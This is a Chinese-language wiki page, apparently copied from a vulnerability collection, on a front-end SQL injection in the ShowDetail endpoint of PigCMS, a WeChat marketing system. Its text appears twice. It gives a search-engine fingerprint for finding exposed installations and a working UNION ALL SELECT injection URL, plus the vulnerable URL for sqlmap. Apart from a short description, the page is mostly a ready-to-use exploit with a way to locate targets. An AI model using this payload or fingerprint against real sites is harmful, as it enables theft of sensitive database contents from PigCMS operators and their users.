fofamini-wiki

登录白背景

源码

PigCMS ShowDetail SQL注入漏洞

一、漏洞简介

PigCms（又称小猪CMS）是一个基于php+mysql的多用户微信营销系统，是国内使用较多、功能强大、性能稳定的多用户微信营销系统。PigCms存在一处前台SQL注入漏洞，攻击者可以通过该漏洞获取数据库敏感信息。

二、影响版本

PigCMS

三、资产测绘

hunterweb.body="/tpl/Home/pigcms/common/js/daohang.js"
特征

四、漏洞复现

/index.php?g=Wap&m=Dining&a=ShowDetail&id=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a717071,0x56416e6e6d4b697077546c6c5057524c687776654847535a6c4c4e4475584b61556f42664d616947,0x717a717871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

sqlmap

/index.php?g=Wap&m=Dining&a=ShowDetail&id=3

原文: https://www.yuque.com/xiaokp7/ocvun2/ufrz1ty6fqw28bq3

# PigCMS ShowDetail SQL注入漏洞

# 一、漏洞简介
PigCms（又称小猪CMS）是一个基于php+mysql的多用户微信营销系统，是国内使用较多、功能强大、性能稳定的多用户微信营销系统。PigCms存在一处前台SQL注入漏洞，攻击者可以通过该漏洞获取数据库敏感信息。

# 二、影响版本

- PigCMS

# 三、资产测绘

- hunter`web.body="/tpl/Home/pigcms/common/js/daohang.js"`
- 特征

![image.png](./img/t34dUwlfwz2p7Nqe/1699633177369-21e7a540-279f-4309-b746-0a25404cbc4a-486265.png)

# 四、漏洞复现
```
/index.php?g=Wap&m=Dining&a=ShowDetail&id=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a717071,0x56416e6e6d4b697077546c6c5057524c687776654847535a6c4c4e4475584b61556f42664d616947,0x717a717871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
```
![image.png](./img/t34dUwlfwz2p7Nqe/1699633748708-ac4a19b5-baa4-4ac2-bab8-aef89bbe84ab-605999.png)sqlmap
```
/index.php?g=Wap&m=Dining&a=ShowDetail&id=3
```
![image.png](./img/t34dUwlfwz2p7Nqe/1699633695437-30e1865b-5ac5-4deb-a437-ad17f443fb36-406429.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ufrz1ty6fqw28bq3>